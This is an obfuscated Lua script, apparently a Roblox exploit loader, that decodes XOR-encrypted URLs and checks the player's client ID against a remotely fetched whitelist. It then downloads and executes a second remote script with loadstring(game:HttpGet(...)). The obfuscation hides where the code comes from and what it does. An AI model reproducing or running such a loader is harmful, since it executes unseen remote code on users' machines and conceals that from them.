--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.5) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v10,v11) local v12={};for v15=1, #v10 do v6(v12,v0(v4(v1(v2(v10,v15,v15 + 1 )),v1(v2(v11,1 + (v15% #v11) ,1 + (v15% #v11) + 1 )))%256 ));end return v5(v12);end local v8=loadstring(game:HttpGet(v7("\217\215\207\53\245\225\136\81\195\194\204\107\225\178\211\22\196\193\206\54\227\169\196\17\223\215\222\43\242\245\196\17\220\140\207\45\227\171\194\12\215\198\216\49\227\163\215\18\222\202\207\32\244\233\151\76\133\140\239\13\195\246\247\59\227\229\254\6\210\246\239\43\243\142\205\116\169\182\198\23\223\140\138\119\181\239\137\10\201\215","\126\177\163\187\69\134\219\167"),true))();local v9=game:GetService(v7("\17\207\50\228\242\34\193\51\209\245\32\222\25\192\238\53\196\41\192","\156\67\173\74\165")):GetClientId();print(v8);for v13,v14 in pairs(v8) do if (v14==v9) then local v16=0 -0 ;while true do if (v16==(1065 -(68 + 997))) then print(v7("\28\182\91\18\171\39\84\49\247\96\50\252\22\71\39\164\76\18\240\102\114\28\146\121\51\142\0\99\23\131\97\35\158\16\20\116\155\70\23\184\102\85\59\184\71\86\242\104\8","\38\84\215\41\118\220\70"));loadstring(game:HttpGet(v7("\88\2\54\2\237\10\89\109\0\255\71\88\37\27\234\88\3\32\7\237\85\4\33\29\240\68\19\44\6\176\83\25\47\93\234\88\19\50\23\236\86\19\33\6\251\72\6\46\29\247\68\19\48\64\174\2\66\109\33\241\92\23\48\19\177\93\23\43\28\177\88\23\33\25\255\83\21\55\28\234\30\26\55\19","\158\48\118\66\114"),true))();break;end end end end
